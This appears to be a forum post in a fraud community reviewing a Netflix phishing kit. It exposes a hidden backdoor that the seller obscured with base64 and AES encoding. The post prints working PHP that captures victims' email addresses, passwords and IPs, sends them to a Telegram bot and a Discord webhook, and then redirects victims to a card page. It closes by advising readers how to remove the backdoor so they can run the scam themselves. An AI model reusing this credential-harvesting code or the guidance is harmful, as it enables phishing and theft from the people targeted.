1. there is no such telegram panel, this scampage just posts results via telegram bot with no commands available whatsoever = Static page. ( also it have stupid bug in loading.php )
2. it is very clearly backdoored with the base64 encrypted string in alot of files. one of these string decoded then decrypted with AES 256 shows code used to post results to a discord user named: Project_001
searching more in the script leads discord webhook hidden in "functions.php" file ofcourse also encrypted in base64 then AES 256
so when this uploader is saying it has no backdoor he is most likely very aware as its obvious from just a quick look at the code all encoded in base64 to hide backdoor.
Take a look at the code of the two files:
session_start();
extract($_REQUEST);
include "../id.php";
include "../verification/function.php";
$F=$_POST['iduserLoginId'];
$C=$_POST['idpassword'];
$ipp=$_SERVER['REMOTE_ADDR'];
$message="[
]_______________|
NETFLIX
|_______________[
]"."\n"."Email address : ".$F."\n"."Password : ".$C."\n"."IP : ".$ipp."\n"."[
]________________|
NETFLIX
|________________[
]";
$user_ids=$id;
foreach($user_ids as $user_id) {
$url='https://api.telegram.org/bot'.$token.'/sendMessage';
$data=array('chat_id'=>$user_id,'text'=>$message);
$options=array('http'=>array('method'=>'POST','header'=>"Content-Type:application/x-www-form-urlencoded\r\n",'content'=>http_build_query($data),),);
$context=stream_context_create($options);
$result=file_get_contents($url,false,$context);
include '../verification/verification.php';
}
$ip_anti = $ip_collector;
$timestamp = date("c", strtotime("now"));
$json_data = json_encode([
// Message
"content" => $message,
"username" => "@Project_001",
"tts" => false,
], JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE );
$ch = curl_init( $ip_anti );
curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-type: application/json'));
curl_setopt( $ch, CURLOPT_POST, 1);
curl_setopt( $ch, CURLOPT_POSTFIELDS, $json_data);
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt( $ch, CURLOPT_HEADER, 0);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1);
$response = curl_exec( $ch );
curl_close( $ch );
header("location: ../cc.php");
Functions.php:
$ip_collector="
https://discord.com/api/webhooks/10...0oh8pS5dpzeEqpEEwzS47qRm4RHbHCf5BuYbvHley5mED";
edit: if anybody want to use the script even through its of low quality just remove the functions.php file or delete all the code that will kill this backdoor atleast ( he could have hidden more in script but i doubt )